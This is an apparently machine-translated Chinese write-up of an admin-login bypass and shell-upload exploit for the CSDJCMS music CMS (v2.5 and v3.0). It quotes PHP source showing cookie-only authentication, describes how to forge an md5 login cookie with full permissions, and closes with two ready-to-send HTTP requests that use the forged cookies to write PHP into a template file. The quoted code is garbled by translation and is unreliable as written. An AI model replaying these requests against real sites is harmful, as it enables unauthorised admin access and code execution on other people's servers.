Analysis of CSDJCMS shell vulnerability and PHP source code

CSDJCMS vulnerability background shell

Include_once ("include/install. php "); if (S_IsInstall = 0) {header (" Location: install/install. php ");} include_once (" include/label. php "); if (S_Webmode = 1 or! File_exists ("index.html") {// cache area $ cache_id = 'index _ '; if (! ($ Cache_opt-> start ($ cache_id) {echo GetTemp ("index.html", 0); $ cache_opt-> end () ;}} else {header ("Location: index.html ");} // check whether function SafeRequest ($ key, $ mode, $ isfilter ='') {set_magic_quotes_runtime (0); $ magic = get_magic_quotes_gpc (); switch ($ mode) {case 'post': $ value = isset ($ _ post [$ key])? $ Magic? Trim ($ _ POST [$ key]): addslashes (trim ($ _ POST [$ key]): ''; break; case 'get ': $ value = isset ($ _ GET [$ key])? $ Magic? Trim ($ _ GET [$ key]): addslashes (trim ($ _ GET [$ key]): ''; break; default: $ value = isset ($ _ POST [$ key])? $ Magic? Trim ($ _ POST [$ key]): addslashes (trim ($ _ POST [$ key]): ''; if ($ value = "") {$ value = isset ($ _ GET [$ key])? $ Magic? Trim ($ _ GET [$ key]): addslashes (trim ($ _ GET [$ key]): '';} break;} if ($ isfilter! = '') {$ Value = lib_replace_end_tag ($ value);} return $ value ;} // The variable is submitted for addslashes Security filtering // after studying the source code for half a day, it is found that there are serious security problems in the background include ".. /include/conn. php "; include ".. /include/function. php "; include" admin_version.php "; include" admin_loginstate.php "; // the problem lies in this file. // enter if (empty ($ _ COOKIE ['s _ adminid']) {// first check whether the coke echo s_adminid exists. "<script> window. location = 'admin _ login. php' </script> ";} elseif ($ _ COOKIE ['s _ Login ']! = Md5 ($ _ COOKIE ['s _ AdminID ']. $ _ COOKIE ['s _ AdminUserName ']. $ _ COOKIE ['s _ AdminPassWord ']. $ _ COOKIE ['s _ Permission ']) {// The key here is the problem. If the value of s_login is equal to the md5 encryption of the four cookies, echo "<script> window. parent. location = 'admin _ login. php' </script> ";}

 

 

// Function SystemPer ($ Column) {if (empty ($ _ COOKIE ['s _ Permission ']) {die ("<script> jAlert ('Sorry, you are not authorized to perform this operation! ', 'Operation error', function (R) {window. location = 'javascript: history. go (-1) ';}) </script> ");} else {$ SystemPermission = explode (", ", $ _ COOKIE ['s _ Permission']); // permission judgment, separated by "," into an array $ StateOK = 0; $ ArrSystemPermission = count ($ SystemPermission); for ($ k = 0; $ k <$ ArrSystemPermission; $ k ++) {if ($ SystemPermission [$ k] ==$ Column) {// judge $ StateOK = 1 ;}} if ($ StateOK = 0) {die ("<script> jAlert ('Sorry, you are not authorized to perform this operation! ', 'Operation error', function (R) {window. location = 'javascript: history. go (-1) ';}) </script> ") ;}}// construct an obscene cookie // S_Permission //, 9, 10, 11,12, 13,14, 15 // S_Login // md5 (AdminID + AdminUserName + AdminPassWord + S_Permission) // S_AdminUserName/1 // S_AdminPassWord // 1 // S_AdminID/1

The background is bypassed successfully.

// Check version 3.0. The same is true. <? Php # Name: PHP version of Cheng's music CMS management system v3.0 # Author: Cheng's <[email] web@chshcms.com [/email]> [QQ: 848769359] # Homepage: [url] http://www.chshcms.cn/ [/Url] $ CS_Path = $ _ SERVER ['php _ SELF ']; $ CS_Pathall = explode ("/", $ CS_Path); $ CS_Admin = $ CS_Pathall [1]. "/"; if (empty ($ _ COOKIE ['cs _ adminid']) {echo "<script> window. parent. location = '". CS_WebPath. $ CS_Admin. "login. php'; </script> ";} elseif ($ _ COOKIE ['cs _ login']! = Md5 ($ _ COOKIE ['cs _ adminid']. $ _ COOKIE ['cs _ adminusername']. $ _ COOKIE ['cs _ adminpassword']. $ _ COOKIE ['cs _ quanx']) {echo "<script> window. parent. location = '". CS_WebPath. $ CS_Admin. "login. php' </script> ";}// backend permission judgment function SystemPer ($ Column) {if (empty ($ _ COOKIE ['cs _ quanx']) {die ("<script> alert ('Sorry, you are not authorized to perform this operation! '); Window. location = 'javascript: history. go (-1); '</script> "); exit ();} else {$ SystemPermission = explode (",", $ _ COOKIE ['cs _ quanx']); $ StateOK = 0; $ ArrSystemPermission = count ($ SystemPermission); for ($ k = 0; $ k <$ ArrSystemPermission; $ k ++) {if ($ SystemPermission [$ k] ==$ Column) {$ StateOK = 1 ;}} if ($ StateOK = 0) {die ("<script> alert ('Sorry, you are not authorized to perform this operation! '); Window. location = 'javascript: history. go (-1);' </script> "); exit ();}}

 

Exp V2.5

Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/admin_t ... ;file=artindex.htmlCookie: S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 169FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5

 

------------------------------------------ Exp V3.0:

Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/skins/s ... ;name=cs-bottom.phpCookie: CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 57name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E